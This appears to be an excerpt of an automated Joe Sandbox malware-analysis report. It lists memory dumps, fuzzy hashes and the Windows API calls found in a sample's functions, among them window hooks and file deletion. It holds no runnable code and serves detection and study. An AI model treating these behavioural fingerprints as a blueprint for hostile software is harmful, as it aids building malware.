                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: File$??3@Findmemcpy$AttributesDirectorylstrcmp$??2@CloseCurrentDeleteFirstNextRemove
                                                                                • String ID:
                                                                                • API String ID: 1254520193-0
                                                                                • Opcode ID: 9b31627a932f6071aa4177330747ff234158f9032b054607de35a00c98215738
                                                                                • Instruction ID: 184ccade124785ef3e2e24a1a723902e2d1148a2b40179e28e9aacba309f937e
                                                                                • Opcode Fuzzy Hash: 9b31627a932f6071aa4177330747ff234158f9032b054607de35a00c98215738
                                                                                • Instruction Fuzzy Hash: BC31AE31A05109BADB12AFB1ED49FEE7B7CAF00315F1041B7A512B11E1EB78AF50CA18
                                                                                APIs
                                                                                • wvsprintfW.USER32(?,00000000,?), ref: 0040978F
                                                                                • GetLastError.KERNEL32 ref: 004097A0
                                                                                • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00920F20), ref: 004097C8
                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00920F20), ref: 004097DD
                                                                                • lstrlenW.KERNEL32(?), ref: 004097F0
                                                                                • lstrlenW.KERNEL32(?), ref: 004097F7
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040980C
                                                                                • lstrcpyW.KERNEL32(00000000,?), ref: 00409822
                                                                                • lstrcpyW.KERNEL32(-00000002,?), ref: 00409834
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040983E
                                                                                • LocalFree.KERNEL32(?), ref: 00409847
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                • String ID:
                                                                                • API String ID: 829399097-0
                                                                                • Opcode ID: 9bb49a77fcf5e4be8f403a21759eda2e0f73d84126fa28e450538bb0b5e3a1e1
                                                                                • Instruction ID: ce60ff98e11a79a3a696769abfe051056d5f9fd39bbc67ce90a5294729797a98
                                                                                • Opcode Fuzzy Hash: 9bb49a77fcf5e4be8f403a21759eda2e0f73d84126fa28e450538bb0b5e3a1e1
                                                                                • Instruction Fuzzy Hash: 22216476900118FFDB14AFA1DC85DEE7BBCEF08354F00847AF90597191EA349E848BA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4693286797036fdb27d3e30d59c7620f526641804aeece5234ceefece6efafb3
                                                                                • Instruction ID: ebec2df155031d12abf2e074bfb409115379ff2ce8712d3ba73aff140c7f857e
                                                                                • Opcode Fuzzy Hash: 4693286797036fdb27d3e30d59c7620f526641804aeece5234ceefece6efafb3
                                                                                • Instruction Fuzzy Hash: 9B122871904248DFCF25DF69C9809ED7BF5BF48304F24816AF81687262DB39E985CB98
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(uxtheme,?,00409204,000004B1,00000000,?,?,?,?,?,0040932F), ref: 00407F39
                                                                                • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407F4A
                                                                                • GetWindow.USER32(?,00000005), ref: 00407F63
                                                                                • GetWindow.USER32(00000000,00000002), ref: 00407F79
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Window$AddressLibraryLoadProc
                                                                                • String ID: SetWindowTheme$uxtheme
                                                                                • API String ID: 324724604-1369271589
                                                                                • Opcode ID: bbf6c28a0305b89c0b96370cc3dca5fcce94809b387f971642420f3a6618e0a6
                                                                                • Instruction ID: 0bc065bbacf3197a1a27c387b1263c95b7af90742e8dbe1cc94099e7c33b47a7
                                                                                • Opcode Fuzzy Hash: bbf6c28a0305b89c0b96370cc3dca5fcce94809b387f971642420f3a6618e0a6
                                                                                • Instruction Fuzzy Hash: 7AF0A732F4A72633C232176A6C48F9B6A5CDF46B61B054176FD04F7281DA6DEC4041EE
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00408EA3
                                                                                • SetWindowsHookExW.USER32(00000007,Function_00008DCA,00000000,00000000), ref: 00408EAE
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00408EBD
                                                                                • SetWindowsHookExW.USER32(00000002,Function_00008E56,00000000,00000000), ref: 00408EC8
                                                                                • EndDialog.USER32(?,00000000), ref: 00408EEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentHookThreadWindows$Dialog
                                                                                • String ID:
                                                                                • API String ID: 1967849563-0
                                                                                • Opcode ID: 3691de3e333e7b092baece99aba207316cf4cb990635e7b2a6dbd410fbca133d
                                                                                • Instruction ID: cda5ca9ca78aa2d930f050b6f2645aeb07f6ea8f0f9f92c422e756f156d8528b
                                                                                • Opcode Fuzzy Hash: 3691de3e333e7b092baece99aba207316cf4cb990635e7b2a6dbd410fbca133d
                                                                                • Instruction Fuzzy Hash: 7F01ADB1600228DFE2107F5BEC44AB2F7ECEB55362B11803FE645D21E1CBB658409B6D
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0040354C
                                                                                • FindClose.KERNEL32(00000000), ref: 00403558
                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040356A
                                                                                • DeleteFileW.KERNEL32(?), ref: 00403575
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find$AttributesCloseDeleteFirst
                                                                                • String ID:
                                                                                • API String ID: 3319113142-0
                                                                                • Opcode ID: 6a61d0b2e63efd2324cefb0b8d0b17696f742564a21834292023f6db47524a43
                                                                                • Instruction ID: c6e9444eb262c84b595320cc7ffe2d3aedaf421e5fcd45af1c9d17f800727631
                                                                                • Opcode Fuzzy Hash: 6a61d0b2e63efd2324cefb0b8d0b17696f742564a21834292023f6db47524a43
                                                                                • Instruction Fuzzy Hash: 01F05E30901564B6DB212F315C48BAA3EACAF01327F54497AE842F11E0D7788B47869E
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,00000000,?,00000000,?,0041E7B8), ref: 0040B47C
                                                                                • memcpy.MSVCRT(?,00000000,00000040,?,00000000,?,0041E7B8), ref: 0040B49E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID:
                                                                                • API String ID: 3510742995-0
                                                                                • Opcode ID: bc90ae24330184fdc1e542b8686ee53d0af4dcd7369474ae96014b3e614f3809
                                                                                • Instruction ID: 4ae693c08babda449d8f98831bc38807ceb3bc3cdeca2b2b28de7c60d0623c83
                                                                                • Opcode Fuzzy Hash: bc90ae24330184fdc1e542b8686ee53d0af4dcd7369474ae96014b3e614f3809
                                                                                • Instruction Fuzzy Hash: 9F916DB29043008FC318DF59D88498BB7E1FFC8314F1A8A6EE9489B355E375E955CB86
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                                                                                • Instruction ID: 462305fb0b224e09127741abaf40dbbd09e9997c9276ae30905a80483bc5e455
                                                                                • Opcode Fuzzy Hash: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                                                                                • Instruction Fuzzy Hash: AD020772A042114BD728CE28C580279BBE2FBC5350F110A3FE896A7AD4D778994DCB99
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 84f162616a20772e74dd71631627c3c9c1bca9b9439662ba305608b213246b3c
                                                                                • Instruction ID: 83bfa8493028414e067c23257a90e250144b075ccba9c150ccd2a674e287ec71
                                                                                • Opcode Fuzzy Hash: 84f162616a20772e74dd71631627c3c9c1bca9b9439662ba305608b213246b3c
                                                                                • Instruction Fuzzy Hash: 9CD1F77199436B4FD354EF8DEC8163677A2AF88300F4A8234CA541B363D6387917DB94
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 706e5b4506d8222bb72eb308eb64e6cbdea08e03554b22f290625d72daa28f67
                                                                                • Instruction ID: e5af3abd718cb8d35efe5b30076fc92d9bf9506f9c82f42336529bb75e4d056e
                                                                                • Opcode Fuzzy Hash: 706e5b4506d8222bb72eb308eb64e6cbdea08e03554b22f290625d72daa28f67
                                                                                • Instruction Fuzzy Hash: AED1E03BA146674FE350DF5DDC84262B7A2EF88310F4E8279DE541B253C634EA12DB84
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1ef3a85183e3002fe42a0a148796e2a0343b3df6179ef6736291ebe652a2f59b
                                                                                • Instruction ID: 8b43415f725c52400ea32066e58f3de959199fbb7ac6094870e9ab37e3e6cffc
                                                                                • Opcode Fuzzy Hash: 1ef3a85183e3002fe42a0a148796e2a0343b3df6179ef6736291ebe652a2f59b
                                                                                • Instruction Fuzzy Hash: 2481DA73A0C32547D7288A1AC980225B6E3FBD1340F174A3FE4A99B3C0E6798956C789
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 123209dfbf82470405aa8cb44f036b459c122f4087a2a39e6df564f031e137c1
                                                                                • Instruction ID: 1df73540e4c2d79fb10e79e5b8cb1a3a58f6520a6752a808dce565b5e6951a96
                                                                                • Opcode Fuzzy Hash: 123209dfbf82470405aa8cb44f036b459c122f4087a2a39e6df564f031e137c1
                                                                                • Instruction Fuzzy Hash: CC51D872B006189F8F24CE5582405E773E5AB84764B1A857ED949DF310E3B4FCE297D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fd5b2c6ed38590160cc8fb173a0877a6425f0538a0edd97a68ed25e58d07123f
                                                                                • Instruction ID: e58164fe841b3d27413a749a66db9a62c92b149f99bc5724522e02b37cf73634
                                                                                • Opcode Fuzzy Hash: fd5b2c6ed38590160cc8fb173a0877a6425f0538a0edd97a68ed25e58d07123f
                                                                                • Instruction Fuzzy Hash: 447139B1A083058FC348DF49D48895AF3E1FFC8318F198A6DE9889B351D771E955CB86
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b31d452cf4fc038398579975b7917bb1ff375609163340ad82824380036c8528
                                                                                • Instruction ID: 2512ae077ffb6cc5c0a98d06df2ad874ef365c90d639dd9bc8b4382b2321abdd
                                                                                • Opcode Fuzzy Hash: b31d452cf4fc038398579975b7917bb1ff375609163340ad82824380036c8528
                                                                                • Instruction Fuzzy Hash: 36413633A04266CBC7248F2C88D417AF790ABD5214F094B7FD996A73C2D2369D49C7D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 73730e3d9151fbadbdc16631f016a2ea510cfbdbc37b2b029a2882c1c2214c2e
                                                                                • Instruction ID: dd20adac85c5117443e66756b5ec49ccb88ee33e59fa4e887385627a91a44c63
                                                                                • Opcode Fuzzy Hash: 73730e3d9151fbadbdc16631f016a2ea510cfbdbc37b2b029a2882c1c2214c2e
